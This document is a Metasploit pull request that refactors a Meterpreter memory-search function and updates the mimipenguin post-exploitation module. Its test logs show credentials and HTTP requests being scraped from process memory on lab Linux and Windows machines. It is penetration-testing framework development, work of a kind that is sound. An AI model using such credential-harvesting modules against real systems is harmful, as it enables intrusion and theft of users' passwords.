### PR TITLE
Memory search module improvements

### DIFF
--- a/lib/msf/core/post/linux/process.rb
+++ b/lib/msf/core/post/linux/process.rb
@@ -18,17 +18,11 @@ module Process
             'Commands' => %w[
               stdapi_sys_process_attach
               stdapi_sys_process_memory_read
-              stdapi_sys_process_memory_search
             ]
           }
         }
       )
     )
-  end
-
-  def mem_search_ascii(min_search_len, max_search_len, needles, pid: 0)
-    proc_id = session.sys.process.open(pid, PROCESS_READ)
-    matches = proc_id.memory.search(needles, min_search_len, max_search_len)
   end
 
   def mem_read(base_address, length, pid: 0)

--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
@@ -301,6 +301,20 @@ class Process < Rex::Post::Process
     self.get_processes
   end
 
+  #
+  # Search memory for supplied regexes and return matches
+  #
+  def Process.memory_search(pid: 0, needles: [''], min_match_length: 5, max_match_length: 127)
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_SEARCH)
+
+    request.add_tlv(TLV_TYPE_PID, pid)
+    needles.each { |needle| request.add_tlv(TLV_TYPE_MEMORY_SEARCH_NEEDLE, needle) }
+    request.add_tlv(TLV_TYPE_MEMORY_SEARCH_MATCH_LEN, max_match_length)
+    request.add_tlv(TLV_TYPE_UINT, min_match_length)
+
+    self.client.send_request(request)
+  end
+
   ##
   #
   # Instance methods

--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb
@@ -133,35 +133,6 @@ class Memory
   end
 
   #
-  # Search memory for supplied regexes and return matches
-  #
-  def search(needles, min_search_len = 5, match_len = 500)
-    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_SEARCH)
-
-    request.add_tlv(TLV_TYPE_PID, process.pid)
-    needles.each { | needle | request.add_tlv(TLV_TYPE_MEMORY_SEARCH_NEEDLE, needle) }
-    request.add_tlv(TLV_TYPE_MEMORY_SEARCH_MATCH_LEN, match_len)
-    request.add_tlv(TLV_TYPE_UINT, min_search_len)
-
-    response = process.client.send_request(request)
-
-    matches = []
-    if response.result == 0
-      response.each(TLV_TYPE_MEMORY_SEARCH_RESULTS) do |res|
-         match_data = {}
-         match_data['match_str'] = res.get_tlv_value(TLV_TYPE_MEMORY_SEARCH_MATCH_STR)
-         match_data['match_offset'] = res.get_tlv_value(TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR)
-         match_data['sect_start'] = res.get_tlv_value(TLV_TYPE_MEMORY_SEARCH_START_ADDR)
-         match_data['sect_len'] = res.get_tlv_value(TLV_TYPE_MEMORY_SEARCH_SECT_LEN)
-
-         matches << match_data
-      end
-    end
-
-    matches
-  end
-
-  #
   # Write memory to the context of a process and return the number of bytes
   # actually written.
   #

--- a/modules/post/linux/gather/mimipenguin.rb
+++ b/modules/post/linux/gather/mimipenguin.rb
@@ -125,8 +125,20 @@ class MetasploitModule < Msf::Post
     target_info['pids'] = target_pids
     target_info['pids'].each_with_index do |target_pid, _ind|
       vprint_status("Searching PID #{target_pid}...")
-      res = mem_search_ascii(5, 500, target_info['needles'], pid: target_pid)
-      target_info['matches'][target_pid] = res.empty? ? nil : res
+      response = session.sys.process.memory_search(pid: target_pid, needles: target_info['needles'], min_match_length: 5, max_match_length: 500)
+
+      matches = []
+      response.each(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_RESULTS) do |res|
+        match_data = {}
+        match_data['match_str'] = res.get_tlv_value(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_MATCH_STR)
+        match_data['match_offset'] = res.get_tlv_value(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR)
+        match_data['sect_start'] = res.get_tlv_value(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_START_ADDR)
+        match_data['sect_len'] = res.get_tlv_value(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_SECT_LEN)
+
+        matches << match_data
+      end
+
+      target_info['matches'][target_pid] = matches.empty? ? nil : matches
     end
   end
 


### PR DESCRIPTION
This PR implements the changes suggested in the previous PR here: https://github.com/rapid7/metasploit-framework/pull/18713
This PR:
- Tries to improve the code quality
- Moves the memory_search function to Meterpreter's stdapi
- ensures mimipenguin works with the changes
- allows the user to print the list of processes on the target machine
- prints some potential reasons as to why the process memory could not be read

## Testing
### Mimipenguin
<details>

```
msf6 post(linux/gather/mimipenguin) > run

[*] Checking for matches in process gnome-keyring-daemon
[*] Checking for matches in process gdm-password
[*] Checking for matches in process vsftpd
[*] Checking for matches in process sshd
[*] Checking for matches in process lightdm
[+] Found 1 valid credential(s)!

Credentials
===========

  Process Name          Username  Password
  ------------          --------  --------
  gnome-keyring-daemon  ubuntu    ubuntu

[*] Credentials stored in /Users/sjanusz/.msf4/loot/20240124194618_default_192.168.112.132_mimipenguin.csv_059650.txt
[*] Post module execution completed
```

</details>

### Memory Search

Here, I am targeting the terminal that is currently used to host a Python server, `python -m http.server` using the `REGEX` option `GET /.*`.

#### Ubuntu 23.04 x64
**x64** (root)
<details>

```
msf6 post(multi/gather/memory_search) > run session=-1 REGEX='GET /.*' PROCESS_NAMES_GLOB='{python*,zsh*,bash*}'

[*] Running module against - root @ 192.168.112.132 (192.168.112.132). This might take a few seconds...
[*] Getting target processes...
[*] Running against the following processes:
        python3 (pid: 1179)
        zsh (pid: 2789)
        zsh (pid: 3622)
        zsh (pid: 4569)
        python3 (pid: 4640)
        zsh (pid: 4682)

[*] No regular expression matches were found in memory for python3 (pid: 1179).
[*] No regular expression matches were found in memory for zsh (pid: 2789).
[*] No regular expression matches were found in memory for zsh (pid: 3622).
[*] No regular expression matches were found in memory for zsh (pid: 4569).
[*] Memory Matches for python3 (pid: 4640)
======================================

 Match Address       Match Length  Match Buffer                     Memory Region Start  Memory Region Size
 -------------       ------------  ------------                     -------------------  ------------------
 0x0000000001F53F90  28            "GET /met.elf HTTP/1.1\" 200 -"  0x0000000001EFB000   0x000000000022B000
 0x00007F65757CDB00  28            "GET /met.elf HTTP/1.1\" 200 -"  0x00007F6574E00000   0x0000000000A00000
 0x00007F65757F9BE5  21            "GET /met.elf HTTP/1.1"          0x00007F6574E00000   0x0000000000A00000

[*] No regular expression matches were found in memory for zsh (pid: 4682).
[*] Post module execution completed
```

</details>

**x86** (non-root)

<details>

```
msf6 post(multi/gather/memory_search) > run session=-1 REGEX='GET /.*' PROCESS_NAMES_GLOB='{python*,zsh*,bash*}'

[*] Running module against - ubuntu @ 192.168.112.132 (192.168.112.132). This might take a few seconds...
[*] Getting target processes...
[*] Running against the following processes:
        python3 (pid: 1179)
        zsh (pid: 2789)
        zsh (pid: 3622)
        zsh (pid: 4569)
        python3 (pid: 4640)
        zsh (pid: 4682)

[!] Memory search request for python3 (pid: 1179) failed. Return code: stdapi_sys_process_memory_search: Operation failed: 1
    Potential reasons:
        Insufficient permissions.
[*] No regular expression matches were found in memory for zsh (pid: 2789).
    Potential reasons:
        Architecture mismatch (session: x86) (process: x64)
[*] No regular expression matches were found in memory for zsh (pid: 3622).
    Potential reasons:
        Architecture mismatch (session: x86) (process: x64)
[*] No regular expression matches were found in memory for zsh (pid: 4569).
    Potential reasons:
        Architecture mismatch (session: x86) (process: x64)
[*] No regular expression matches were found in memory for python3 (pid: 4640).
    Potential reasons:
        Architecture mismatch (session: x86) (process: x64)
[*] No regular expression matches were found in memory for zsh (pid: 4682).
    Potential reasons:
        Architecture mismatch (session: x86) (process: x64)
[*] Post module execution completed
```

</details>

#### Metasploitable2 VM

**x86** (root)

<details>

```
msf6 post(multi/gather/memory_search) > run session=-1 REGEX='GET /.*' PROCESS_NAMES_GLOB='{python*,zsh*,bash*}'

[*] Running module against - root @ metasploitable.localdomain (192.168.112.178). This might take a few seconds...
[*] Getting target processes...
[*] Running against the following processes:
        bash (pid: 5208)
        bash (pid: 5276)

[*] No regular expression matches were found in memory for bash (pid: 5208).
[*] No regular expression matches were found in memory for bash (pid: 5276).
[*] Post module execution completed
```

</details>

#### Windows
**x64** (user)

<details>

```
msf6 post(multi/gather/memory_search) > run session=-1 REGEX='GET /.*' PROCESS_NAMES_GLOB='{python*,zsh*,bash*,[Ww]indows[Tt]erminal*}'

[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
[*] Getting target processes...
[*] Running against the following processes:
        WindowsTerminal.exe (pid: 3028)
        bash.exe (pid: 7720)
        bash.exe (pid: 3916)
        bash.exe (pid: 5688)
        bash.exe (pid: 2956)
        bash.exe (pid: 5452)
        bash.exe (pid: 724)
        bash.exe (pid: 4396)
        bash.exe (pid: 8736)
        bash.exe (pid: 5188)
        python.exe (pid: 1292)
        bash.exe (pid: 7528)

[*] Memory Matches for WindowsTerminal.exe (pid: 3028)
==================================================

 Match Address       Match Length  Match Buffer                                                                                    Memory Region Start  Memory Region Size
 -------------       ------------  ------------                                                                                    -------------------  ------------------
 0x00000189D6A97319  127           "GET /putty-memsearch HTTP/1.1\" 200 -.. -..xe    putty-memsearch.[5C       putty-memsearch-te  0x00000189D6A54000   0x000000000004E000
                                   st-rsa.pub   working_resolution.pat"

[*] No regular expression matches were found in memory for bash.exe (pid: 7720).
[*] No regular expression matches were found in memory for bash.exe (pid: 3916).
[*] No regular expression matches were found in memory for bash.exe (pid: 5688).
[*] No regular expression matches were found in memory for bash.exe (pid: 2956).
[*] No regular expression matches were found in memory for bash.exe (pid: 5452).
[*] No regular expression matches were found in memory for bash.exe (pid: 724).
[*] No regular expression matches were found in memory for bash.exe (pid: 4396).
[*] No regular expression matches were found in memory for bash.exe (pid: 8736).
[*] No regular expression matches were found in memory for bash.exe (pid: 5188).
[*] Memory Matches for python.exe (pid: 1292)
=========================================

 Match Address       Match Length  Match Buffer                                                                                    Memory Region Start  Memory Region Size
 -------------       ------------  ------------                                                                                    -------------------  ------------------
 0x000002B968B90761  127           "GET /putty-memsearch HTTP/1.1\" 200 -.. -..h.......h.......h....p..h....p..h.......h.......h.  0x000002B968B00000   0x00000000000FF000
                                   ...................0..h....0..h...."
 0x000002B96AF1E131  127           "GET /putty-memsearch HTTP/1.1\" 200 -...-.......p..j.......j...............O.............l.O.  0x000002B96AEC0000   0x0000000000100000
                                   ......j.......O.......j......?i...."
 0x000002B96AF1E5B1  127           "GET /putty-memsearch HTTP/1.1\" 200 -...-.......p..j.................... e,i.................  0x000002B96AEC0000   0x0000000000100000
                                   ..................................."
 0x000002B96AF96DC1  127           "GET /putty-memsearch HTTP/1.1\" 200 -............n.j....p..O....(............................  0x000002B96AEC0000   0x0000000000100000
                                   ...\\Users\\win10\\desktop\\putty-memse"
 0x000002B96AF96E81  127           "GET /putty-memsearch.pub HTTP/1.1\" 200 -....................................................  0x000002B96AEC0000   0x0000000000100000
                                   ..................................."
 0x000002B96AFAB5D0  127           "GET /putty-memsearch HTTP/1.1...0..j....p..j.............\\.O.............t.j................  0x000002B96AEC0000   0x0000000000100000
                                   ....p..j.......j.............\\.O..."
 0x000002B96AFB1DC0  127           "GET /putty-memsearch HTTP/1.1...p3.j.......................O.....l.O.........................  0x000002B96AEC0000   0x0000000000100000
                                   ...........Xp.O.......j..........."

[*] No regular expression matches were found in memory for bash.exe (pid: 7528).
[*] Post module execution completed
```

</details>

**x64** (admin) (verbose)

<details>

```
msf6 post(multi/gather/memory_search) > run session=-1 REGEX='GET /.*' PROCESS_NAMES_GLOB='{python*,zsh*,bash*,[Ww]indows[Tt]erminal*}' verbose=true

[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
[*] Getting target processes...
[*] Process List
============

 Matched?  PID   PPID  Name                         Arch  Session  User                          Path
 --------  ---   ----  ----                         ----  -------  ----                          ----
 false     0     0     [System Process]
 false     4     0     System                       x64   0
 false     92    4     Registry                     x64   0
 false     320   4     smss.exe                     x64   0
 false     356   624   dwm.exe                      x64   1        Window Manager\DWM-1          C:\Windows\System32\dwm.exe
 false     432   416   csrss.exe                    x64   0
 false     508   416   wininit.exe                  x64   0
 false     516   500   csrss.exe                    x64   1
 false     592   508   services.exe                 x64   0
 false     624   500   winlogon.exe                 x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 false     632   508   lsass.exe                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 false     648   792   WmiPrvSE.exe                 x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 true      724   5452  bash.exe                     x64   1        DESKTOP-NO8VQQB\win10         C:\Users\win10\scoop\apps\git\2.42.0.2\usr\bin\bash.exe
 false     792   592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     812   508   fontdrvhost.exe              x64   0        Font Driver Host\UMFD-0       C:\Windows\System32\fontdrvhost.exe
 false     820   624   fontdrvhost.exe              x64   1        Font Driver Host\UMFD-1       C:\Windows\System32\fontdrvhost.exe
 false     904   2104  audiodg.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\audiodg.exe
 false     908   592   svchost.exe                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 false     956   592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     1032  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     1040  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     1048  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     1056  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     1072  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     1116  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     1124  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     1240  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     1284  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 true      1292  5188  python.exe                   x64   1        DESKTOP-NO8VQQB\win10         C:\Users\win10\scoop\apps\python311\3.11.6\python.exe
 false     1312  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     1396  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     1436  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     1468  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     1572  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     1576  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     1600  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     1668  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     1676  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     1732  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     1748  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     1764  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     1772  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     1928  592   svchost.exe                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 false     1956  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     1964  592   Everything.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Everything\Everything.exe
 false     1988  4     Memory Compression           x64   0
 false     2028  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     2036  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     2104  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     2188  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     2220  592   svchost.exe                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 false     2228  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     2236  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     2252  792   MoUsoCoreWorker.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\MoUsoCoreWorker.exe
 false     2292  792   SecurityHealthHost.exe       x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\SecurityHealthHost.exe
 false     2348  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     2356  592   svchost.exe                  x64   0
 false     2404  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     2416  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     2484  592   spoolsv.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 false     2620  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     2632  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     2680  592   svchost.exe                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 false     2900  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     2932  792   dllhost.exe                  x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\dllhost.exe
 true      2956  5688  bash.exe                     x64   1        DESKTOP-NO8VQQB\win10         C:\Users\win10\scoop\apps\git\2.42.0.2\usr\bin\bash.exe
 false     3012  592   svchost.exe                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 false     3020  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 true      3028  5540  WindowsTerminal.exe          x64   1        DESKTOP-NO8VQQB\win10         C:\Users\win10\scoop\apps\windows-terminal-preview\1.18.1462.0\WindowsTer
                                                                                                 minal.exe
 false     3036  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     3064  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     3084  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     3096  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     3116  592   dllhost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dllhost.exe
 false     3128  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     3152  592   vmtoolsd.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 false     3168  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     3176  592   vm3dservice.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vm3dservice.exe
 false     3184  592   VGAuthService.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
 false     3228  592   MsMpEng.exe                  x64   0
 false     3300  3028  OpenConsole.exe              x64   1        DESKTOP-NO8VQQB\win10         C:\Users\win10\scoop\apps\windows-terminal-preview\1.18.1462.0\OpenConsol
                                                                                                 e.exe
 false     3304  592   SgrmBroker.exe               x64   0
 false     3308  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     3528  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     3544  3176  vm3dservice.exe              x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\vm3dservice.exe
 false     3792  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 true      3916  7720  bash.exe                     x64   1        DESKTOP-NO8VQQB\win10         C:\Users\win10\scoop\apps\git\2.42.0.2\usr\bin\bash.exe
 false     3964  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     3972  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     4112  1436  sihost.exe                   x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\sihost.exe
 false     4228  592   svchost.exe                  x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\svchost.exe
 false     4304  592   svchost.exe                  x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\svchost.exe
 false     4312  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 true      4396  3028  bash.exe                     x64   1        DESKTOP-NO8VQQB\win10         C:\Users\win10\scoop\apps\git\2.42.0.2\bin\bash.exe
 false     4432  1240  taskhostw.exe                x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\taskhostw.exe
 false     4484  1240  taskhostw.exe                x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\taskhostw.exe
 false     4584  592   svchost.exe                  x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\svchost.exe
 false     4608  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     4636  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     4644  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     4752  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     4776  592   msdtc.exe                    x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 false     4828  592   SearchIndexer.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
 false     4948  4752  ctfmon.exe                   x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\ctfmon.exe
 true      5188  8736  bash.exe                     x64   1        DESKTOP-NO8VQQB\win10         C:\Users\win10\scoop\apps\git\2.42.0.2\usr\bin\bash.exe
 false     5228  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     5260  1576  dasHost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\dasHost.exe
 false     5432  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 true      5452  3028  bash.exe                     x64   1        DESKTOP-NO8VQQB\win10         C:\Users\win10\scoop\apps\git\2.42.0.2\bin\bash.exe
 false     5512  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     5540  5468  explorer.exe                 x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\explorer.exe
 true      5688  3028  bash.exe                     x64   1        DESKTOP-NO8VQQB\win10         C:\Users\win10\scoop\apps\git\2.42.0.2\bin\bash.exe
 false     5752  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     5816  792   smartscreen.exe              x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\smartscreen.exe
 false     5836  592   svchost.exe                  x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 false     5860  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     5892  5540  met.exe                      x64   1        DESKTOP-NO8VQQB\win10         \\vmware-host\Shared Folders\Programming\metasploit-framework\tmp\met.exe
 false     5912  592   svchost.exe                  x64   0
 false     5984  792   ShellExperienceHost.exe      x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHo
                                                                                                 st.exe
 false     6104  792   RuntimeBroker.exe            x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\RuntimeBroker.exe
 false     6384  3028  OpenConsole.exe              x64   1        DESKTOP-NO8VQQB\win10         C:\Users\win10\scoop\apps\windows-terminal-preview\1.18.1462.0\OpenConsol
                                                                                                 e.exe
 false     6408  792   UserOOBEBroker.exe           x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\oobe\UserOOBEBroker.exe
 false     6680  792   CalculatorApp.exe            x64   1        DESKTOP-NO8VQQB\win10         C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_11.2307.4.0_x64_
                                                                                                 _8wekyb3d8bbwe\CalculatorApp.exe
 false     6696  792   ApplicationFrameHost.exe     x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\ApplicationFrameHost.exe
 false     6752  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     6764  792   StartMenuExperienceHost.exe  x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2tx
                                                                                                 yewy\StartMenuExperienceHost.exe
 false     6936  792   RuntimeBroker.exe            x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\RuntimeBroker.exe
 false     6996  3028  OpenConsole.exe              x64   1        DESKTOP-NO8VQQB\win10         C:\Users\win10\scoop\apps\windows-terminal-preview\1.18.1462.0\OpenConsol
                                                                                                 e.exe
 false     7040  792   SearchApp.exe                x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.ex
                                                                                                 e
 false     7384  592   svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 false     7432  792   LockApp.exe                  x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
 false     7440  792   RuntimeBroker.exe            x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\RuntimeBroker.exe
 false     7568  792   SecHealthUI.exe              x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHeal
                                                                                                 thUI.exe
 false     7592  792   RuntimeBroker.exe            x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\RuntimeBroker.exe
 false     7696  5540  ProcessHacker.exe            x64   1        DESKTOP-NO8VQQB\win10         C:\Users\win10\scoop\apps\processhacker\2.39\ProcessHacker.exe
 false     7700  3028  OpenConsole.exe              x64   1        DESKTOP-NO8VQQB\win10         C:\Users\win10\scoop\apps\windows-terminal-preview\1.18.1462.0\OpenConsol
                                                                                                 e.exe
 true      7720  3028  bash.exe                     x64   1        DESKTOP-NO8VQQB\win10         C:\Users\win10\scoop\apps\git\2.42.0.2\bin\bash.exe
 false     7788  792   SecurityHealthHost.exe       x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\SecurityHealthHost.exe
 false     7988  792   TextInputHost.exe            x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInput
                                                                                                 Host.exe
 false     8160  792   RuntimeBroker.exe            x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\RuntimeBroker.exe
 false     8396  5540  SecurityHealthSystray.exe    x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\SecurityHealthSystray.exe
 false     8428  592   SecurityHealthService.exe    x64   0
 false     8524  5540  Everything.exe               x64   1        DESKTOP-NO8VQQB\win10         C:\Program Files\Everything\Everything.exe
 false     8600  792   RuntimeBroker.exe            x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\RuntimeBroker.exe
 true      8736  4396  bash.exe                     x64   1        DESKTOP-NO8VQQB\win10         C:\Users\win10\scoop\apps\git\2.42.0.2\usr\bin\bash.exe
 false     8760  5540  vmtoolsd.exe                 x64   1        DESKTOP-NO8VQQB\win10         C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 false     8852  792   RuntimeBroker.exe            x64   1        DESKTOP-NO8VQQB\win10         C:\Windows\System32\RuntimeBroker.exe
 false     9084  792   PhoneExperienceHost.exe      x64   1        DESKTOP-NO8VQQB\win10         C:\Program Files\WindowsApps\Microsoft.YourPhone_1.23102.126.0_x64__8weky
                                                                                                 b3d8bbwe\PhoneExperienceHost.exe
